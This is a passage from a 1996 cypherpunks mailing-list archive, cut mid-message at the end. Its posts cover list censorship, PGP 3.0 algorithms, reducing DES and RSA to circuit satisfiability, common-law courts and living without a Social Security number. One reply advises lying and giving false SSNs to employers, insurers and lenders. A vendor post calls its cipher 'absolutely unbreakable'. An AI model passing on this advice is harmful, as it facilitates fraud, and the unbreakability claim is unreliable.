>    last week, I disagree. Anyone who's spent any time on the
>    100-plus-messages-a-day list can read for themselves the kind of nasty
>    daily messages that came from Vulis's keyboard. The list is on
>    Gilmore's machine and he can do what he wants with it; he can moderate
>    the postings, he can censor material, he can shut the whole thing down.

[mo' snippo]

So you disagree.  Well, the last sentence above says it all - this "list"
that you and 1900+ other people spend so much time on is "just property"
(like a slave), it's censorable (meaning freedom of speech is *specifically
excluded*), and it's terminable without notice (meaning that it's really
just one person's private fantasy, and we'll all bozos on the bus, as it were).

You and several other "personal friends/insiders" to John Gilmore must be
laughing your butts off at the erstwhile schmoes like myself, who labor to
reason with persons like yourself and "gods" like John Gilmore, who, after
all, are obviously superior to us schmoes, since we sit and beg for our
portions of email emanating from John "God" Gilmore's Holy Computer.

Why do you bother telling us that:

  "He can moderate the postings"
  "He can censor material"
  "He can shut the whole thing down"

Why?  Is this your way (or "God"'s way) of waving your dicks in our faces?

Well, I'll tell you what.  You can run your list (or kiss someone's butt
who does), you can shut the thing down, and you can take a long walk off
a short pier for all I or most anyone gives a damn, but let's call a spade
a spade.  You're a suck-up, and Gilmore is a swaggering, overbearing, tin-
plated dictator with delusions of Godhood.  Satisfied?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 13 Nov 1996 21:04:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cypherpunks Shooting Club II
Message-ID: <Pine.3.89.9611132037.A16692-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


Last Sunday, only four Cypherpunks participated in the first field trip 
organized by the Cypherpunks Shooting Club. Though I dare say that we had 
loads of fun. Anybody interested in participating next Sunday is 
encouraged to contact me. A wide range of firearms will be provided.


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Member JPFO. "America's Aggressive Civil Rights Organization"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 13 Nov 1996 21:40:15 -0800 (PST)
To: Sean Roach <roach_s@alph.swosu.edu>
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <199611130139.RAA14024@toad.com>
Message-ID: <328AAD68.3B56@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Sean Roach wrote:
> At 08:26 AM 11/11/96 -0800, Hal Finney wrote:
> >I have two kids entering their teens, and I'm sure other list members are
> >parents as well.  What can we do for our children to help them enter their
> >adult lives with better chances to retain privacy?  Unicorn mentions keeping
> >them absent from school on picture day, although I'm not sure how much this
> >helps.  I suppose it makes it harder for an investigator to find out what
> >they look(ed) like.  Then when they get old enough to drive you have a new
> >problem avoiding the photo (and thumbprint) on the license.

> As far as the drivers linscense goes, there are religions that do not allow
> its members to be photographed, and the government honers this,(at least the
> Tag Offices do).  I don't know the name of the religion but I believe it is
> a Christian one.  Convert once every four years to get your drivers
> liscense, and convert back within the week.  No photograph on that little
> piece of plastic.
> P.S.  In Oklahoma, there is no thumbprint on the current liscense.
> P.P.S  You can always send your child to school with a note saying that you
> do not want your child in the class picture, I know of someone who did that,
> (on a side-note, we always wondered why.)

Certain conservative sects [Puritan, Amish (I think)] believe strongly in
the Old Testament command to "not make any image of anything in the air,
on the ground, or in the sea" (quote approximate).  This was done to
prevent image (idol) worship.

It's ironic, given that most conservative Christians who claim to believe
sincerely in the adage against idol worship will nonetheless have those
beautiful, high-tech studio portraits of their children somewhere in the
house, highly visible for all visitors and residents to gaze upon.

But sadly, most Christians, like most non-Christians, just can't resist
the temptation to worship idols, albeit in a more subtle way than bowing
down to the molten calf.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Wed, 13 Nov 1996 18:52:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9611140239.AA16352@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


Foulmouthed Timothy May rehashes his lies like a rabid parrot
choking on a stale mantra stuck in its poisonous beak.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Thu, 14 Nov 1996 09:04:43 -0800 (PST)
To: Bert-Jaap Koops <E.J.Koops@kub.nl>
Subject: Re: PGP3.0 & ElGamal
Message-ID: <847990496.613504.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> > Also I understand, though there appears to be no available
> > documentation saying as much, that pgp3.0 will not use RSA, nor IDEA,
> > nor MD5, using instead El Gamal for public key encryption and
> > signatures, 3DES (unsure?), and SHA1.
> 
> Can someone confirm that PGP3.0 will use ElGamal?
> 

I cannot confirm that but I do know 3.0 will be downward compatible 
using RSA keys for people using 2.x, I also understand that IDEA will 
be the symmetric algorithm though I can`t confirm this.

I know 3.0 uses discrete log cryptography but whether it will be 
El Gamal or DH or other I don`t know. I would imagine in the end it 
would come down to a question of what is unpatented first and I have 
no idea on the patent date for El Gamal (is it even patented?) but DH 
hasn`t long to go....



 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 13 Nov 1996 21:52:55 -0800 (PST)
To: "Phillip M. Hallam-Baker" <hallam@ai.mit.edu>
Subject: Re: A Disservice to Mr. Bell
Message-ID: <199611140552.VAA09808@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:19 PM 11/13/96 -0500, Phillip M. Hallam-Baker wrote:
>Jim Bell writes
>
>> There are, I think, two reasons that the equity court system (and their 
>> sleazy lawyers, both on and off the bench) are worried.  First, what they
>> have now is, effectively, a monopoly on "justice."  The re-emergence of 
>> commonlaw courts would provide competition that has been long gone. 
>Think 
>> of it like any monopoly that suddenly has to accept competition.
>
>A bunch of self selected whackos running a kangeroo court does not mark a
>return to "commonlaw courts".

As for the "self-selected" issue:  In almost all areas of human endeavor, 
things are (often?  usually?) done by people who are "self-selected."  I 
suggest that there is simply no reason that even "self-selected" courts 
cannot work.

And for the "wacko" part:  To a great extent, the people who would tend to 
oppose the re-emergence of commonlaw courts are those who are the ones who 
most benefit from the monopoly (oligopoly?) on justice which has developed 
over many decades.  Judges, prosecutors, and lawyers of course profit 
directly.  But psychologically, people wedded to a statist philosophy would 
have their precious worlds overturned.  They're not happy.  

Also:  The reason for an (apparent, implied) association with extremism is, 
simply, because the system has been  suppressed (actively or passively) for 
so long that it tends to be the "extremists" which most notice the 
possibilities of a commonlaw court.  This is quite analogous with the fact 
that the label "extremists" was almost certainly applied to the 
revolutionaries who proposed the American Revolution, the abolition of 
slavery, giving the vote to women, pushed civil rights in the US during the 
50's and 60's, etc.  By definition, people proposing a change in the status 
quo are "extremists," if they weren't they wouldn't be proposing a change, 
huh?!?

And this goes back to the "self-selected" issue above as well.  While the 
main work of commonlaw courts, today, is the reversal of the abuses of the 
equity court system, as the commonlaw courts become once again well accepted 
they will simply not need to stand out and look "extreme" as they may look 
to you, today.


> Such courts do not exist within the  constitution
>of the United States. Unlike the UK the US has a written constitution, if
>it isn't written down on paper then it does not exist.

You're obviously confused.  

1.  Commonlaw courts predate the US Constitution by a few hundred years.  
The former does not depend on the latter for authority or credibility.  

2.  The US Constitution is, at most, a statement of the authority of the 
FEDERAL portion of government. It is, arguably, only a statement of the 
powers granted to the Feds by the people; it is most certainly not intended 
to be a statement of every right retained by the people.  (In fact, the 9th 
and 10th amendments make it clear that non-enumerated rights exist.)  No 
authority over commonlaw courts (such as appointing judges)  was given to 
the Feds by the people.

3. The Federal Constitution only references states, and I don't think it 
references state Constitutions at all.  Yet clearly state Constitutions 
exist.  Clearly, it isn't correct to say "if it isn't written down on paper 
then it does not exist."  For example, people are not "written down on 
paper," yet they exist...


> The structure of the courts, 

You should have said, SOME courts.  Not "the courts," implying ALL the 
courts.  Notice that the US Federal Constitution (at least, to my 
recollection) does not describe or regulate state courts, or for that matter 
local courts.  Just Federal, which is as was intended.   Given this, there 
is no reason to assume that commonlaw courts need to be described, 
authorized, or regulated by the Feds.  If your argument is, "if it isn't 
defined by the Federal Constitution it doesn't exist," then you'd just 
destroyed your own argument.  


>the legislature and such was the principle task of the constitution,
>that is why the bill of rights is a set of ammendments - they were an
>afterthought.


This has absolutely nothing to do with the commonlaw court system.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Wise <jw250@columbia.edu>
Date: Wed, 13 Nov 1996 19:06:51 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Black markets vs. cryptoanarchy
In-Reply-To: <v03007800aeafa43b5167@[207.167.93.63]>
Message-ID: <Pine.SUN.3.95L.961113215641.15151B-100000@ahnnyong.cc.columbia.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, Timothy C. May wrote:

> At 10:56 PM -0500 11/12/96, Jim Wise wrote:

> >Which it does...  FWIW, I tend to agree with your general point, but I
> >moved from downtown Manhattan to Harlem recently, and was surprised to see
> >how many foodstuffs cost _more_ up here, as well as the obvious fact that
> >many are harder to get...  Junk food and cheap liquor are everywhere,
> >though...
 
> But you're conflating a separate issue: the cost of doing business in
> high-crime ghettoes. Both rich and poor alike find prices high and
> selection poor in high-crime ghettoes. Likewise, both rich and poor alike
> find prices low and selection good in low-crime, suburban locales.

I would hardly classify alphabet city as a `low-crime suburban locale'.
Much more of an issue is that the locals downtown are much closer to being
within walking distance of the higher-rent higher-income areas, so the
local bodegas must keep prices low to compete.  Up here, it's a lot
farther to an alternative, and a lot fewer people have cars, so you have a
lot fewer choices.  The result is that what choices there are can pretty
much stock what they please and charge what they please...

The issue here is much more one of the insularity of the ghetto than it's
crime rate...

--
				Jim Wise
				System Administrator
				GSAPP, Columbia University
				jim@santafe.arch.columbia.edu
				http://www.arch.columbia.edu/~jim
				* Finger for PGP public key *





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 13 Nov 1996 20:00:41 -0800 (PST)
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
Message-ID: <3.0b36.32.19961113223308.00c43ba4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:14 PM 11/11/96 -0600, Igor Chudov @ home wrote:
>This is an interesting topic. I apologize if my questions are too trivial,
>but here they are: 
>
>	1) Can a person without an SSN have a credit record? Some
>	   may say that a credit record is a bad thing to have,
>	   but I am still interested in a possibility.

If you have a credit history you can have a credit record with or without
an SSN.  Millions of foreigners have credit histories without SSNs BTW.
Millions of people with wrong or false SSNs also have credit histories.
The SSA decided a few years ago not to let the credit reporting agencies
check the validity of the SSNs in their records with the SSNs in the SSA
database.

>	2) Will private lenders (such as credit card issuers or
>	   mortgage companies) agree to extend credit to a person
>	   without an SSN or to someone who refuses to give out his SSN?

Not if they are in America but those outside America will.  False SSN's may
work though falsifying mortgage applications (with a federally insured
bank) may be a crime.  Individuals can also grant mortgages however and are
free to do so without using an SSN.  

>	3) Will the state issue a driver's license to someone who does not
>	   have/does not wish to give out their SSN?

Those states that don't require SSNs will of course.  Some (most?) states
that require SSNs don't validate them.  Canadian provinces don't require US
SSNs to issue licenses.

>	4) Will states' police (where applicable) approve purchases of
>	   firearms if purchasers do not state their ssn (misstating it
>	   may be a crime) on an application?

It's been so long since I bought from a dealer.  Do the current federal
forms have a place for SSN?  

>	5) Employers are required to pay certain taxes and therefore
>	   they, in my understanding, need to know their employees SSNs.
>	   How can people get around that (unless they do not need to work)?

Lie, be self employed, or be employed by a foreign entity.  They won't be
able to verify until the new Instant Check Right to Work Verification
scheme that the Feds are testing breaks wide.  Then it's self-employment --
better for you in any case.

>	6) Can someone without an SSN obtain various kinds of insurance?

Some kinds.  Again, the numbers are rarely verified.  

Over the years, I've only seen one number be bounced back and that was
submitted to a bank by a person who did not vet the number for facial
validity.  If one institution turns you down, go to another.

>Say, John Anonymous is a young 15 years old who anticipates to become an
>engineer and have a middle class life. He wants to get married,

No problem (unless his fiance wants to run a credit check).  Even if the
marriage license app wants an SSN, just say you're a foreigner with no SSN.
 Foreigners can still marry in America.  Even if you also state on the same
form that you were born in the US, you could still be a foreigner who's
never really lived here.  "My father was the Canadian Ambassador at the time."

>have children

Still accomplished by unskilled labor totally without an SSN.  

>drive a car

Put hands on wheel and foot on gas.  Trivial.  Lie or get a foreign
license.  UK licenses are good for decades.  A dozen states (or so) still
let you operate a motor vehicle sans public liability insurance BTW and
non-drivers, corporations, other entities, in fact anyone or anything can
own a car.  You can drive a car owned by something/someone else.

>obtain insurance

Lie.  Or get insurance from a nice Swiss company.
  
>work at some big company,

A lot less of that going around these days.  Giving a false SSN may or may
not be caught.  Large companies often do credit checks these days but you
will probably survive.  If you're working at a large company as a
contractor or temp of course, your small agency may not have checked you
out much.  You can satisfy the I9 form requirements for proving right to
work by flashing your passport BTW and you can still get a passport without
supplying an SSN (in spite of the law).

>travel around the world

No problem.  The ICAO record format for the nice little machine readable
strip on passports *does* have space to place a National ID Number, but the
standards do not require that a nation issue a National ID Number and fill
that block.  The UK and the US and others have (so far) not done so.  The
US legislation (effective January 1988) that the Passport Office's
Application ask you for your SSN and forward info on refusenicks to the
Treasury Department for a possible $500 fine, specifically says that
failure to provide the number shall not be grounds for refusal by State to
issue a passport.  In practice, Treasury has not fined anyone. 

>invest in mutual funds or buy stocks

Lie, have a corporation or trust you control buy, buy overseas or via
Canada, etc.

>Reliance on government help is not important to him, so he would not
>apply for an SSN solely to get Social Security, welfare and such.
>
>His parents are cypherpunks and did not obtain an SSN for John. How much 
>effort would it cost him to live a life outlined above?

Less effort that cross country skiing (in calories burned).  May even
provide similar recreational value depending on John's ideology.

DCF 

"You're real smart.  I bet you never forget your Social Security Number.
What's your Social Security Number"? -- The Susan Sarandon character in
"Atlantic City"

"I don't have a Social Security Number." -- The Burt Lancaster character in
"Atlantic City"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Nov 1996 20:52:18 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: PGP3.0 & ElGamal
In-Reply-To: <Pine.3.89.9611131930.A5464-0100000@netcom14>
Message-ID: <Pine.SUN.3.94.961113224825.7335F-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, Lucky Green wrote:

> On Wed, 13 Nov 1996, Black Unicorn wrote:
> 
> > On Wed, 13 Nov 1996, Derek Atkins wrote:
> > > The PGP 3.0 code that I've been working on has support for:
> > > 	IDEA, 3DES
> > > 	MD5, SHA1
> > > 	RSA, DSS, ElGamal
> > > 
> > > It does not discontinue support for the PGP 2.6.2 algorithms.  It adds
> > > support for new ones.
> > 
> > Absolutely outstanding.
> 
> I agree. Support for soon to be patent free algrithms is a good thing. I 
> hope that in version 4.0, after the users had time to migrate to 
> DSS/ElGamal, PGP will fully move away from RSA.

Personally, I'd prefer it if crypto applications had wide support, user
selectable, for as many methods as possible.

I'm still mildly curious as to why support for >128 bit keys is not
available in any form I know of.

> 
> --Lucky
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 13 Nov 1996 21:38:18 -0800 (PST)
To: dave@kachina.jetcafe.org (Dave Hayes)
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <199611132320.PAA17335@kachina.jetcafe.org>
Message-ID: <199611140501.XAA05790@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dave Hayes wrote:
> You won't do this, because I won't let you on the list. I, unlike you
> or Mr. Gilmore, have the judgement on whom to invite to my list.
> 

So what's the difference between yours and gilmore's position?

Long live USENET Cabal!

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp@pobox.com
Date: Wed, 13 Nov 1996 21:16:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <v03007800aeade37ef979@[207.167.93.63]>
Message-ID: <Chameleon.847948472.amp@tx86-8>
MIME-Version: 1.0
Content-Type: text/plain



> (Side note: Jim McCoy's suggestion that kids can be kept off the
> parental-unit's tax returns and thus not get a SS number is fraught with
> problems. Many schools--including public schools--use the SS number for
> various internal and tracking reasons. Even if the kid is free of SS
> numbers until he's a teenager--at a cost of thousands of dollars a year in
> IRS deductions not taken--he'll essentially have to have an SS number in
> his high school years, for a variety of reasons. Maybe this can be avoided,
> but I doubt the reward is worth the hassles.)
 
I recently enrolled my kid in school. On a form they asked what her SSn was. I just 
left the form blank. Later when they asked me about it, I asked if it was =required=, 
prepared to have them provide me with stautory citations. They said it was not 
required, but that they needed a way to keep records. I suggested they use her name. 
Since that wouldn't work with their computer, I suggested they make one up that fit 
the program.



------------------------
Name: amp
E-mail: amp@pobox.com
Date: 11/13/96
Time: 23:10:57
Visit http://www.public-action.com/SkyWriter/WacoMuseum

EARTH FIRST! We'll strip mine the other planets later.
------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 13 Nov 1996 20:22:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <9611140239.AA16352@cow.net>
Message-ID: <v0300780faeb04d72341a@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:39 pm -0500 11/13/96, Bovine Remailer wrote:
>Foulmouthed Timothy May rehashes his lies like a rabid parrot
>choking on a stale mantra stuck in its poisonous beak.

This is getting rather poetic.

Vitriol haiku...

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@vesuvius.ai.mit.edu
Date: Wed, 13 Nov 1996 20:20:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: A Disservice to Mr. Bell
Message-ID: <9611140425.AA01113@vesuvius.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Jim Bell writes

> There are, I think, two reasons that the equity court system (and their 
> sleazy lawyers, both on and off the bench) are worried.  First, what they

> have now is, effectively, a monopoly on "justice."  The re-emergence of 
> commonlaw courts would provide competition that has been long gone. 
Think 
> of it like any monopoly that suddenly has to accept competition.

A bunch of self selected whackos running a kangeroo court does not mark a
return to "commonlaw courts". Such courts do not exist within the
constitution
of the United States. Unlike the UK the US has a written constitution, if
it isn't written down on paper then it does not exist. The structure of the
courts, the legislature and such was the principle task of the
constitution,
that is why the bill of rights is a set of ammendments - they were an
afterthought.

I think the courts are worried the way a truck driver is worried about 
roadkill.

Its always the agent-provocateurs who are the loudest voices. If I was an
FBI agent looking to snare a few pillocks I would be trolling in 
cypherpunks with an AP like story. I would also be boasting about my
knowing about people in hiding...

If Bell and Thorn are Freeh's agents then would they kindly bugger off
and find another place to troll. Alternatively they could arrest each 
other.


		Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Wise <jw250@columbia.edu>
Date: Wed, 13 Nov 1996 20:29:18 -0800 (PST)
Subject: Re: Black markets vs. cryptoanarchy
In-Reply-To: <awecXD1w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.95L.961113231505.27570A-100000@konichiwa.cc.columbia.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> I spent a few years living in Columbia housing on 111th St and there are
> plenty of good, cheap groceries around. If you choose to save on the rent
> and to live, e.g., up by City College, then indeed there are fewer groceries
> and they cost more. The clerks who work there also get paid much more than
> the clerks midtown because they risk their lives.
> And you spend more time commuting to Columbia.

These days City College has a miniature version of CU's higher-rent bubble
effect.  At any rate within a few blocks of either school is rather a bit
better off than the surrounding areas.  111th is much more within CU's
sphere of influence, and prices at markets like Westside and UFM drop as
they compete for the student crowd.  That neighborhood has a pocket of
slightly more variety as well, for the same reasons.  As you walk north,
the number of liquor stores rises even as the number of businesses
drops...

--
				Jim Wise
				System Administrator
				GSAPP, Columbia University
				jim@santafe.arch.columbia.edu
				http://www.arch.columbia.edu/~jim
				* Finger for PGP public key *





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 13 Nov 1996 20:30:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PGP3.0 & ElGamal
In-Reply-To: <Pine.SUN.3.94.961113200754.4470C-100000@polaris>
Message-ID: <v03007813aeb0506ae6a3@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:43 pm -0500 11/13/96, Lucky Green wrote:
>I agree. Support for soon to be patent free algrithms is a good thing. I
>hope that in version 4.0, after the users had time to migrate to
>DSS/ElGamal, PGP will fully move away from RSA.

Speaking of patent-free, :-), can you do blind signatures without RSA?

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com
Date: Thu, 14 Nov 1996 14:11:30 -0800 (PST)
To: Eli Brandt <eli@gs160.sp.cs.cmu.edu>
Subject: Re: FCPUNX:Small 'Hard' Problems Wanted
Message-ID: <199611142211.OAA21942@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Eli Brandt <eli@gs160.sp.cs.cmu.edu> writes:

 > (I'm getting this this through fcpunks, so my reply is
 > going to you. If you reply, you can cc cypherpunks if you
 > want.)

Ok.

[snip]

 >> ... I plan to test it on reduced round DES, full 16 round
 >> DES, and some RSA problems of various sizes.

 > These are all in NP (though not necessarily NP-C), so you
 > can certainly solve them with SAT, but I'd be *very*
 > surprised if SAT were an efficient way to do it.  If
 > SAT-reduction beats the number field sieve at factoring, for
 > example, you've got a major research result.

Actually, I would expect any AI algorithm which has some notion
of convergence to beat all of the "combination of congruences"
factoring methods, which are essentially exhaustive searches,
albeit it under the image of some useful transformations and
homomorphisms.

SAT (boolean satisfiability) does not seem to illuminate
factoring or other cyptographic problems in any obvious way. Even
a prime implicant covering of a typical strong cryptographic
function would be mondo huge in terms of memory.  Crypto problems
map pretty nicely into circuit problems, however, and circuit
satisfiability seems to be a nice wedge with which to attack a
number of the most popular ones.  Of course, you can go back and
forth between circuit and SAT problems, but thinking in terms of
circuits allows you to add the correct additional variables to a
problem which would be gigantic if you did the output directly in
terms of the input bits.

I will wait to see if this thing munches through DES of various
rounds before claiming any "research results."

 >> I already have C code to map RSA and n-round DES problems
 >> into an appropriate circuit satisfiability problem

 > How big a SAT problem does an n-bit RSA or n-round DES
 > problem turn into?

Well - the typical DES S-Box requires between 130-155 2-input
logical operations to express its 4 bit output in terms of its 6
bit input if you basically construct it in the obvious no-brainer
way without attempting any clever optimization.

Throw in a few XORs, and you can wire 2 round DES in about 2,500
one and two input logical operations, and the full 16 round DES
takes about 25,000.  I'm sure this can be improved upon greatly,
if someone wanted to tweek the wiring diagram.

What I've done to convert DES to a circuit satisfiability problem
is to make a logical network with (56+64+64) input bits and 1
output bit. The input consists of (key,plaintext,ciphertext).  I
pass both the plaintext and ciphertext through the IP, and do
half the rounds on each with the appropriate subkeys.  Then I XOR
opposite 32 bit sections between them, OR it all together, and
complement the output.

This yields something which lights up if the key maps the
provided plaintext into the provided ciphertext and outputs zero
otherwise.  When it is instantated with a particular
plaintext/ciphertext pair, this diagram can be munched by the
previously mentioned algorithm to yield a possibly non-empty set
of keys.

RSA is a little bit more messy.  Given a modulus between 2^k < N
< 2^(k-1), you can construct a circuit which when instantated
with the modulus bits will light up if and only if the larger
of the two distinct primes is input.  The way I do this requires
only two multiplicative operations, one being a modular
reciprocal of an odd number modulo 2^k, and the other being a
multiplication.  Both of these are wired as N^2 algorithms,
using successive approximation, although near-linear algorithms
probably exist.

As a data point, a circuit which lights up when RSA-140 is input
can be done in about a million NANDs.  Someone has offered me
some time on a 64 meg ultraSparc to try some RSA problems, but I
am going to debug the C version on DES first.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Wed, 13 Nov 1996 22:07:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Key for the IPG 200 Megabytes at NETPRIVACY.COM
Message-ID: <Pine.BSI.3.95.961113235812.20589A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain



In response to the numerous requests for us to post the key that we used
to produce the almost 200 megabytes of raw encryptor stream at our web
site, we are pleased to provide the ASCII values of same as follows: 



OFFSET    0   1   2   3   4   5   6   7   8   9
    0    237  55 181 123  98 190 172 218  32  95 
    1     76 254  70 151 109 109 115  87 146 142 
    2    233 129 176 197 154  22 122 168  96   9 
    3    115 234 241  54  78 120  81  33 128 196 
    4    177   8  69  53  71 116   0 245 126 158 
    5     29 239  80 219  86 236 193  50   7  31 
    6     84 188   5 215 175 213 222   4 180 144 
    7    187 162 205 215  60 144 120  75 195  66 
    8    178  81 212  56 123 177 189 113 101  91 
    9    211 194  48 171  17  64 197 118 148  24 
   10     32  67 114 171  26 131  19 149 121  32 
   11    235 112 114  45  28  80  37 142 138  15 
   12    229 228 155 214  66 246 174 195 224 215 
   13    116 233 106 209  66 233 175 229 244 245 
   14     74  81 136 163 100  21 114 240  48 184 
   15    124 151 145  74  34  33  14  70 132  37 
   16     82 253  70  97  72  20 106  41 162  30 
   17    136  18 105 227 219 232 121  49 119 218 
   18      6  97 193 180 228 204  92 158 116 222 
   19    145  91  34 200 199 235 178 116 103 196 
   20     79 104  90  22  69 212  91  65 171 133 
   21     92 208  76 127  37  83  92 140  27 249 
   22    229  22 132 205   5  67 203   8 196 141 
   23    136  80  68 156 228  38 254  97 170 179 
   24     43 152 124 172  91  52  79  94 248 131 
   25    202  82  36  41  11 229 

As explained at the web site, that key is expanded to an 8192 byte key and
used as described therein.

                    www.netprivacy.com

In order for those few who have not had the opportunity to check it out,
we will leave it up another week and then take it down and put up a
new shorter one, maybe a 2,560,000 byte one permanently and a monthly
2,560,000 byte one where we publish the key each month. 

Of course, no university, coderpunk, or cypherpunk, or any collection of
same,  has broken the system, nor will they ever.  As most of you now
know, it is absolutely unbreakable. We have had over 100 universities,
IBM, Microsoft, Intel, hundreds of other corporations, several dozen
different government agencies, and thousands of other individuals to
download the data and look at the algorithm. Of course, like everyone
else, they have been benighted, even if some of them will not own up to
it.

Several people have requested me to provide a narrative description of the
algorithm explaining why the raw encryptor output stream seems to be so
remarkably random. I am preparing such a document and it should be ready
next week, or the week after. I will post it accordingly.

Thanks so very much, 

Don Wood







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 14 Nov 1996 00:22:17 -0800 (PST)
To: hallam@vesuvius.ai.mit.edu
Subject: Re: A Disservice to Mr. Bell
In-Reply-To: <9611140425.AA01113@vesuvius.ai.mit.edu>
Message-ID: <328AD670.4EDD@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


hallam@vesuvius.ai.mit.edu wrote:
> Jim Bell writes
> > There are, I think, two reasons that the equity court system (and their
> > sleazy lawyers, both on and off the bench) are worried.  First, what they
> > have now is, effectively, a monopoly on "justice."  The re-emergence of
> > commonlaw courts would provide competition that has been long gone.
> >Think of it like any monopoly that suddenly has to accept competition.

> A bunch of self selected whackos running a kangeroo court does not mark
> a return to "commonlaw courts". Such courts do not exist within the
> constitution of the United States. Unlike the UK the US has a written
> constitution, if it isn't written down on paper then it does not exist.

"It doesn't exist".  Well!  The difference between the intent of the law
and the "letter" of the law:  The Constitution, if it is about anything,
it is about Balance of Power. You could refer back to the DOI for examples
of how to settle BOP disparities when governments become too big for their
britches, or you could accept "creative civil disobedience" such as Common
Law Courts as a way to add some balance.  Unless, of course, you're the
troll you're talking about below.

> The structure of the courts, the legislature and such was the principle
> task of the constitution, that is why the bill of rights is a set of
> ammendments - they were an afterthought. I think the courts are worried
> the way a truck driver is worried about roadkill.

An afterthought?  No.  The Constitution was a document provided at the
behest of the States, with their approval (not dictated by the Feds), and
those States would not ratify said document without the Enumeration of
rights now referred to as the Bill of Rights.  It's an enumeration only,
to tell the Feds that "these are your powers", etc., and "don't try to
mess with any of these things enumerated here in these 10 amendments",
and so forth.

> Its always the agent-provocateurs who are the loudest voices. If I was an
> FBI agent looking to snare a few pillocks I would be trolling in
> cypherpunks with an AP like story. I would also be boasting about my
> knowing about people in hiding...
> If Bell and Thorn are Freeh's agents then would they kindly bugger off
> and find another place to troll. Alternatively they could arrest each other.

Agent-provocateurs?  My, aren't we paranoid.  I hope the Thorn character
is someone else, not me.  If you read all or most all of my postings over
the past couple of months, you would see why the FBI and all those other
alphabet-agencies wouldn't hire me.  They had to cheat just to get me a
Confidential clearance in the Army (the lowest possible clearance).

I can't speak for Jim Bell, but my impression (for the 100th time) of AP
